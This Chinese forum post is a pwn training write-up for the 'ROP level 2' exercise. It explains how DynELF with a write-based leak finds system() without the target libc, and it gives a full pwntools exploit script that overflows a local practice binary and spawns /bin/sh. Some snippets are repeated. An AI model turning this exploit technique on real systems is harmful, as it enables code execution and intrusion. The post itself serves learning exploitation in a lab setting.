首页
社区
课程
招聘
蒸米ROP level 2 - 在不获取目标libc.so的情况下进行ROP攻击
发表于: 2024-5-1 13:07 8818

蒸米ROP level 2 - 在不获取目标libc.so的情况下进行ROP攻击

2024-5-1 13:07
8818

ubuntu1~16.04.12
pwndbg
python

不通过确认libc版本,使用DynELF暴力搜找到system 获取shell

https://blog.csdn.net/ATFWUS/article/details/104823539
DynELF的使用,也需要注意一些限制条件和具体的使用范围:

这次不需要知道libc版本通过DynELF去暴力搜索system

leak 这个回调函数需要可以反复调用
原理就是通过DynELF函数暴力枚举内存地址,使用(write or puts)获得地址地址都存放了什么东西。

获得system 后差字符串,可以使用read函数向.bbs数据段写入/bin/sh,然后通过地址去引用存放变量。

.bss 段可以通过IDA查看ctrl+s 看到起始位置和结束位置。
.bss段(Block Started by Symbol)用来存储未初始化的全局变量和静态变量的内存,这些变量在程序加载时没有明确的初始值,通常被初始化为零或空。

在调用system这个call的时候注意堆栈平衡POP_POP_POP_ret这个为返回地址是为了把p32(0) 、p32(bass_addr) 、 p32(8)这三个, 三处pop出去让system_add成为栈顶

使用ROPgadget --binary level2 --only 'pop|ret' 找三个POP就行

DynELF(leak, elf=ELF('./level2')) # leak为回调函数,elf需要暴力枚举的程序
system_addr = d.lookup('system', 'libc') # 通过lookup就可以获得system函数
DynELF(leak, elf=ELF('./level2')) # leak为回调函数,elf需要暴力枚举的程序
system_addr = d.lookup('system', 'libc') # 通过lookup就可以获得system函数
def leak(address):
    pylaod1 = 'a'*140+ p32(write_plt) +p32(vulfunAddr) + p32(0x1) + p32(address) + p32(0x4)
    p.send(pylaod1)
    data = p.recv(4)
    print ("%#x => %s" % (address, (data or '').encode('hex')))
    return data
 
d = DynELF(leak, elf=ELF('./level2'))
system_addr = d.lookup('system', 'libc')
print("system_addr", hex(system_addr))
def leak(address):
    pylaod1 = 'a'*140+ p32(write_plt) +p32(vulfunAddr) + p32(0x1) + p32(address) + p32(0x4)
    p.send(pylaod1)
    data = p.recv(4)
    print ("%#x => %s" % (address, (data or '').encode('hex')))
    return data
 
d = DynELF(leak, elf=ELF('./level2'))
system_addr = d.lookup('system', 'libc')
print("system_addr", hex(system_addr))
payload1 = 'a'*140 + p32(read_plt) + p32(POP_POP_POP_ret) + p32(0) + p32(bass_addr) + p32(8)
payload1 += p32(system_addr) + p32(0x0) + p32(bass_addr)
payload1 = 'a'*140 + p32(read_plt) + p32(POP_POP_POP_ret) + p32(0) + p32(bass_addr) + p32(8)
payload1 += p32(system_addr) + p32(0x0) + p32(bass_addr)
#coding:utf-8[/size][/align][align=left][size=3]
from pwn import * 
 
p = process('./level2')
elf = ELF("./level2")
POP3_ret = 0x080484bd
bss_addr = 0x0804A018
write_plt = elf.symbols['write']
read_plt = elf.symbols['read']
vulnerable_function_addr = elf.symbols['vulnerable_function']
 
# 暴力枚举
def leak(addrs):
    payload = b'a'*140 + p32(write_plt) + p32(vulnerable_function_addr) + p32(0x1) + p32(addrs) + p32(0x4)
    p.send(payload)
    data  = p.recv(4)
    print("%#x => %s" % (addrs,(data.encode('hex') if data  else ''  )))
    return data
b = DynELF(leak=leak, elf=elf)
system_addr = b.lookup('system', 'libc')
print("system_addr: %#x" % system_addr)
 
 
# payload 2  Exp
payload1 = b'a'*140 + p32(read_plt) + p32(POP3_ret) + p32(0x0) +p32(bss_addr) + p32(7) #注意7这是/bin/sh的长度read是自动会给填结束符的\0写不写都行
payload1 += p32(system_addr)+ p32(0) + p32(bss_addr)
if args.G:
    gdb.attach(p, "b *vulnerable_function")
 
p.send(payload1)
p.send('/bin/sh\0')
 
p.interactive()
#coding:utf-8[/size][/align][align=left][size=3]
from pwn import * 
 
p = process('./level2')
elf = ELF("./level2")
POP3_ret = 0x080484bd
bss_addr = 0x0804A018
write_plt = elf.symbols['write']
read_plt = elf.symbols['read']

[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课

收藏
免费 1
支持
分享
最新回复 (1)
雪    币: 3535
活跃值: (31016)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
2
感谢分享
2024-5-1 22:10
1
游客
登录 | 注册 方可回帖
返回
//